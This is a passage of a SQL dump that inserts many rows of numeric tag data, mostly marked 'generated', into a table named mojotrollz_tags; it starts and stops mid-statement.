`mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (271, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (272, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (272, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (273, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (273, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (274, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (274, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (275, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (275, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (276, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (276, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (277, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (277, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (278, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (278, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (279, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (279, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (284, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (285, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (285, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (288, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (288, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (289, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (289, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (294, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (294, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (295, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (295, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (297, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (297, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (299, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (299, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (300, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (302, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (302, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (304, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (305, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (306, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (307, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (308, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (311, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (311, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (313, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (313, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (314, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (315, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (315, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (325, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (325, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (327, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (327, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (328, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (328, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (329, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (330, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (330, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (331, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (331, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (332, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (332, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (334, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (334, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (335, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (335, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (338, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (338, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (340, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (340, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (341, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (341, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (342, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (342, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (343, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (343, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (344, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (344, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (345, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (345, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (346, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (346, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (347, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (347, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (347, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (347, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (347, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (348, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (348, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (349, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (349, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (352, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (352, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (356, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (358, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (359, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (372, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (372, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (374, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (374, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (375, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (375, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (376, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (376, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (377, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (377, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (379, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (379, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (381, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (381, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (382, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (382, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (383, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (383, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (384, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (384, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (385, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (385, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (390, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (390, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (391, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (391, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (392, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (392, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (395, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (395, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (397, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (397, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (412, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (415, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (415, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (416, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (417, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (417, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (422, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (422, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (423, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (423, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (424, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (424, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (426, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (426, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (428, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (428, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (429, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (429, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (430, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (430, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (431, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (431, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (432, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (432, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (433, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (433, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (434, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (434, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (435, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (435, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (436, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (436, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (437, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (437, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (440, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (440, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (441, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (441, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (442, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (442, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (445, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (445, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (446, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (446, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (448, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (448, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (449, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (449, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (450, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (452, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (452, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (453, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (453, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (454, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (454, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (456, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (456, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (458, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (458, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (459, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (459, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (460, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (460, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (461, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (461, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (462, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (462, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (464, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (464, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (465, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (465, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (466, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (466, 1, 2, 1519, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (466, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (467, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (467, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (468, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (468, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (469, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (469, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (471, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (471, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (472, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (472, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (473, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (473, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (474, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (474, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (475, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (475, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (476, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (476, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (478, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (478, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (480, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (480, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (481, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (481, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (482, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (482, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (483, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (483, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (485, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (485, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (486, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (486, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (487, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (487, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (488, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (488, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (489, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (489, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (490, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (490, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (491, 1, 1, 0, 'generated'); INSERT INTO 